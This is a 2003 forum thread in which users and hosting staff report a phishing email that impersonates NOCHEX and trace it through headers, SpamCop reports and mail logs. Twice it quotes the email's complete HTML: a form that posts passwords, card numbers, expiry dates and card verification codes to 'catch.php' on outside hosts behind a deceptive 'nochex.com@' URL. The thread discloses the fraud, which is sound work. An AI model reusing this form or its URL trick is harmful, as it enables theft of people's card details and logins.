I recieved the following message; items in red have been edited from the headers. Forwarded this to the host listed, to the bandwidth provider (Yipes) and to the host where the catch script is.

This is (for anyone that doesn't want to bother reading the HTML I'm pasting) a request for me to update my NoCHEX information. I am in Dallas, TX, and obviously have nothing to do with NoCHEX. This is similar to the eBay scams that have happened recently. The difference here is that the form is embedded in the email rather than asking you to visit a site to update it.

---------------------------------------------------------------

Return-path: <nobody@cerebellum.nationhosts.com>
Envelope-to: email@mydomain.org
Delivery-date: Wed, 28 May 2003 18:49:45 +0000
Received: from nationhosts.com ([66.227.104.219] helo=cerebellum.nationhosts.com)
by my.host.name with esmtp (TLSv1:DES-CBC3-SHA:168)
(Exim 3.36 #1)
id 19L5za-0001tk-00
for email@mydomain.org; Wed, 28 May 2003 18:49:42 +0000
Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36 #1)
id 19L5zq-0000QC-00
for email@mydomain.org; Wed, 28 May 2003 14:49:58 -0400
To: email@mydomain.org
Subject: Dear NOCHEX Customer
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Accounts@NOCHEX.com
Reply-To: Security@NOCHEX.com
Message-Id: <E19L5zq-0000QC-00@cerebellum.nationhosts.com>
Date: Wed, 28 May 2003 14:49:58 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cerebellum.nationhosts.com
X-AntiAbuse: Original Domain - mydomain.org
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [99 99]
X-AntiAbuse: Sender Address Domain - cerebellum.nationhosts.com


<html>
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD><img border=0 src=http://support.NOCHEX.com/web/gfx/homepagetop.gif width=631 height=79>
</TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=5 width=600 align=center border=0>
<TBODY>
<TR>
<TD class=pp_sortofbig align=middle>Dear NOCHEX Customer</TD></TR>
<TR>
<TD vAlign=top>
<P>&nbsp;</P>
<P>This e-mail is the notification of recent innovations taken by NOCHEX
to detect inactive customers and non-functioning mailboxes.</P>
<P>The inactive customers are subject to restriction and removal in the
next 3 months.</P>
<P>Please confirm your email address and and Credit Card info<B 8pt
font-size: bold; font-weight: normal; font-variant:> </B>number by logging
in to your NOCHEX account using the form below:</P></TD></TR>
<TR>
<TD align=middle>
<FORM action=http://nochex.com@server1.freehu.com/16/fusen/matt/catch.php
method=post><BR><BR>
<CENTER>
<TABLE border=0>
<TBODY>
<TR>
<TD><B style=FONT-WEIGHT: bold 8pt>Email Address:</B></TD>
<TD><INPUT maxLength=32 size=30 name=lgn></TD></TR>
<TR>
<TD><B style=FONT-WEIGHT: bold 8pt>Password:</B></TD>
<TD><INPUT type=password maxLength=32 size=30 name=psw></TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal; font-variant:>Full
Name :&nbsp;</B></TD>
<TD><INPUT maxLength=32 size=30 name=full_name></TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal; font-variant:>Card
Type:</B></TD>
<TD><SELECT name=card_type> <OPTION value=>&nbsp;</OPTION>
<OPTION value=V selected>Visa/Delta/Electron</OPTION> <OPTION
value=M>MasterCard/Eurocard</OPTION> <OPTION
value=D>Discover</OPTION> <OPTION value=A>American
Express</OPTION> <OPTION value=S>Switch</OPTION> <OPTION
value=O>Solo</OPTION></SELECT> </TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Credit Card #:&nbsp;</B></TD>
<TD><INPUT maxLength=16 size=30 name=cc></TD>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Exp.Date(mm/yyyy) #:&nbsp;</B></TD>
<TD><INPUT maxLength=7 size=30 name=exp_date></TD></TR>
<TR>
<TD><B 8pt font-size: bold; font-weight: normal; font-variant:>Card
Verification <BR>Number:</B></TD>
<TD><INPUT maxLength=4 size=3 name=val><FONT color=red size=1>(3
digits, on back of card) </FONT></TD></TR></TBODY></TABLE>
<P><INPUT type=submit value=Confirm> </P></FORM>
<P><BR><SPAN class=pp_smalltext>This notification expires May 31,
2003</SPAN> </P></CENTER></TD></TR>
<TR>
<TD align=middle>
<table width=610 height=32 cellpadding=0 cellspacing=0>
<tr>
<td width=640 height=12 valign=top colspan=11><img src=http://support.nochex.com/web/gfx/homepagebottom.gif width=640 height=12 alt=NOCHEX Email Money. Homepage.></td>
</tr></table>
<BR><STRONG>Thanks for using NOCHEX! </STRONG><BR></TD></TR>
<TR>
<TD><IMG src=paypal_files/dot_row_long.gif width=590 height=5></TD></TR>
<TR>
<TD class=pp_footer><BR>Copyright© 2002 NOCHEX Inc. All rights reserved. Designated
trademarks and brands are the property of their respective owners.
</TD></TR></TBODY></TABLE>
</html>

-------------------------------------------------------------------

Just posted for the curious, or perhaps if there is someone from "nationhosts", FDCServers (where the IP address is) or Yipes that happens to visit these forums, hopefully they will shut this down.

I just got two of these emails and sent an email to Nochex

Hope they shut this fraudster down before people lose their money.

Eric

Funny, I tried sending this email to Nochex (I got two of them as well), and they don't have an abuse box or a fraud box .... had to resort to sending to support@nochex.com

Also just found this: http://www.server1.freehu.com/16/fusen/

:eek: Total emails collected : 99061 :eek: I hope they will get them shutdown ASAP!

Abuse@nochex.com bounced back to me, but webmaster@nochex.com went through. I even sent a link to this thread in a follow-up email to them. Let's hope they jump on this.

Sort of a depressed version of the...

[EDIT - sorry, will not list other scams in case they inspire others. :o ]

Hi I was e-mailed the following, I host a domain called aol-forum.com but NOT a nochex.com I'm not sure how they got spam but it looks like it's coming from aol-forum.com, I own nationhosts.com their account is currently suspended but heres the copy.

please deal with this spam problem immediately. If we don`t get responce
from you in next 6 hours your server will be disconnected

regards

FDCservers
----- Original Message -----
From: <270280998@reports.spamcop.net>
To: <abuse@fdcservers.net>
Sent: Wednesday, May 28, 2003 11:51 AM
Subject: [SpamCop (http://aol-forum.com/eimages/polls/catch.php)
id:270280998]Dear NOCHEX Customer


> - SpamCop V1.3.3 -
> This message is brief for your comfort. Please follow links for details.
>
> http://spamcop.net/w3m?i=z270280996z0ade984269d48f6f9dce3849e4d3d15ez
> Email from 66.227.104.219 / Wed, 28 May 2003 14:51:22 -0400
>
> http://spamcop.net/w3m?i=z270280998z21638ffa8183a328c1e56839a2fad5f8z
> Spamvertised website: http://aol-forum.com/eimages/polls/catch.php
> > http://aol-forum.com/eimages/polls/catch.php is 66.227.107.164; Wed, 28
May 2003 23:10:07 GMT
>
> Offending message:
> Return-path: <nobody@cerebellum.nationhosts.com>
> Envelope-to: x
> Delivery-date: Wed, 28 May 2003 14:51:22 -0400
> Received: from nationhosts.com ([66.227.104.219]
helo=cerebellum.nationhosts.com)
> by server1.***********.com with esmtp (TLSv1:DES-CBC3-SHA:168)
> (Exim 3.36 #1)
> id 19L61C-0003aH-00
> for x; Wed, 28 May 2003 14:51:22 -0400
> Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36
#1)
> id 19L61V-0001Ct-00
> for x; Wed, 28 May 2003 14:51:41 -0400
> To: x
> Subject: Dear NOCHEX Customer
> MIME-Version: 1.0
> Content-type: text/html; charset=iso-8859-1
> From: Accounts@NOCHEX.com
> Reply-To: Security@NOCHEX.com
> Message-Id: <E19L_________t-00@cerebellum.nationhosts.com>
> Date: Wed, 28 May 2003 14:51:41 -0400
> X-AntiAbuse: This header was added to track abuse, please include it with
any abuse report
> X-AntiAbuse: Primary Hostname - cerebellum.nationhosts.com
> X-AntiAbuse: Original Domain - b2phat.com
> X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [99 99]
> X-AntiAbuse: Sender Address Domain - cerebellum.nationhosts.com
>
>
> <html>
> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
> <TBODY>
> <TR>
> <TD><img border=0
src=http://support.NOCHEX.com/web/gfx/homepagetop.gif width=631 height=79>
> </TD></TR></TBODY></TABLE>
> <TABLE cellSpacing=0 cellPadding=5 width=600 align=center border=0>
> <TBODY>
> <TR>
> <TD class=pp_sortofbig align=middle>Dear NOCHEX Customer</TD></TR>
> <TR>
> <TD vAlign=top>
> <P>&nbsp;</P>
> <P>This e-mail is the notification of recent innovations taken by
NOCHEX
> to detect inactive customers and non-functioning mailboxes.</P>
> <P>The inactive customers are subject to restriction and removal in
the
> next 3 months.</P>
> <P>Please confirm your email address and and Credit Card info<B 8pt
> font-size: bold; font-weight: normal; font-variant:> </B>number by
logging
> in to your NOCHEX account using the form below:</P></TD></TR>
> <TR>
> <TD align=middle>
> <FORM action=http://nochex.com@aol-forum.com/eimages/polls/catch.php
> method=post><BR><BR>
> <CENTER>
> <TABLE border=0>
> <TBODY>
> <TR>
> <TD><B style=FONT-WEIGHT: bold 8pt>Email Address:</B></TD>
> <TD><INPUT maxLength=32 size=30 name=lgn></TD></TR>
> <TR>
> <TD><B style=FONT-WEIGHT: bold 8pt>Password:</B></TD>
> <TD><INPUT type=password maxLength=32 size=30
name=psw></TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Full
> Name :&nbsp;</B></TD>
> <TD><INPUT maxLength=32 size=30 name=full_name></TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Card
> Type:</B></TD>
> <TD><SELECT name=card_type> <OPTION value=>&nbsp;</OPTION>
> <OPTION value=V selected>Visa/Delta/Electron</OPTION>
<OPTION
> value=M>MasterCard/Eurocard</OPTION> <OPTION
> value=D>Discover</OPTION> <OPTION value=A>American
> Express</OPTION> <OPTION value=S>Switch</OPTION> <OPTION
> value=O>Solo</OPTION></SELECT> </TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
> font-variant:>Credit Card #:&nbsp;</B></TD>
> <TD><INPUT maxLength=16 size=30 name=cc></TD>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
> font-variant:>Exp.Date(mm/yyyy) #:&nbsp;</B></TD>
> <TD><INPUT maxLength=7 size=30 name=exp_date></TD></TR>
> <TR>
> <TD><B 8pt font-size: bold; font-weight: normal;
font-variant:>Card
> Verification <BR>Number:</B></TD>
> <TD><INPUT maxLength=4 size=3 name=val><FONT color=red size=1>(3
> digits, on back of card) </FONT></TD></TR></TBODY></TABLE>
> <P><INPUT type=submit value=Confirm> </P></FORM>
> <P><BR><SPAN class=pp_smalltext>This notification expires May 31,
> 2003</SPAN> </P></CENTER></TD></TR>
> <TR>
> <TD align=middle>
> <table width=610 height=32 cellpadding=0 cellspacing=0>
> <tr>
> <td width=640 height=12 valign=top colspan=11><img
src=http://support.nochex.com/web/gfx/homepagebottom.gif width=640 height=12
alt=NOCHEX Email Money. Homepage.></td>
> </tr></table>
> <BR><STRONG>Thanks for using NOCHEX! </STRONG><BR></TD></TR>
> <TR>
> <TD><IMG src=paypal_files/dot_row_long.gif width=590
height=5></TD></TR>
> <TR>
> <TD class=pp_footer><BR>Copyright© 2002 NOCHEX Inc. All rights
reserved. Designated
> trademarks and brands are the property of their respective owners.
> </TD></TR></TBODY></TABLE>
> </html>
>
>
>
>

Hi,
Our server admin at nationhosts is looking through the logs right now to see if anyone was using sendmail command or SMTP as well as e-mail logs to check if any large ammounts of traffic were sent. I appologize for any problems this has caused you. Thanks.

If we find the logs we will post them and censor what we feel should not be released(such as IP's)

this is what we found.

2003-05-28 15:51:12 19L6x6-00081Q-00 rejected from mailrelay.base.be [195.95.20.42]: temporarily unable to verify sender address ; Wed, 28 May 2003 21:51:18 +0200 (MET DST)
P Received: by mailhub.base.be from localhost
(router,slmail V5.1); Wed, 28 May 2003 21:50:48 +0200
for
P Received: by mailhub.base.be from localhost
(router,slmail V5.1); Wed, 28 May 2003 21:50:43 +0200
for
P Received: from cerebellum.nationhosts.com (nationhosts.com [66.227.104.219])
by mailrelay.base.be (Postfix) with ESMTP id 73ECA41BF2
for ; Wed, 28 May 2003 21:51:06 +0200 (MET DST)
P Received: from nobody by cerebellum.nationhosts.com with local (Exim 3.36 #1)
id 19L6wY-0007rx-00
for tony.doyle@base.be; Wed, 28 May 2003 15:50:38 -0400
F From:
T To:
R Reply-To:
Subject: DELIVERY FAILURE: User tony.doyle (tony.doyle@base.be) not listed in public
Name & Address Book
MIME-Version: 1.0
I Message-Id:
Date: Wed, 28 May 2003 15:50:38 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - cerebellum.nationhosts.com
X-AntiAbuse: Original Domain - base.be
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [99 99]
X-AntiAbuse: Sender Address Domain - cerebellum.nationhosts.com
X-SLUIDL: 94F6A705-FEE34B5E-B09EB731-34203FFD
Content-Type: multipart/report; report-type=delivery-status; boundary="==IFJRGLKFGIR40697UHRUHIHD"

this user is unauthorized to access our servers, i found this odd, looks like some european cell phone company...

Good to see quick action on this, Matt. :)

looks like my customer that got suspended didn't take the base.be thing too well and instead went and took it out ouch!

Well, the hole was not plugged. I'm getting more scam mail today, still reading as cerebellum.nationhosts.com.

You probably should go ahead and disable that formmail script altogether.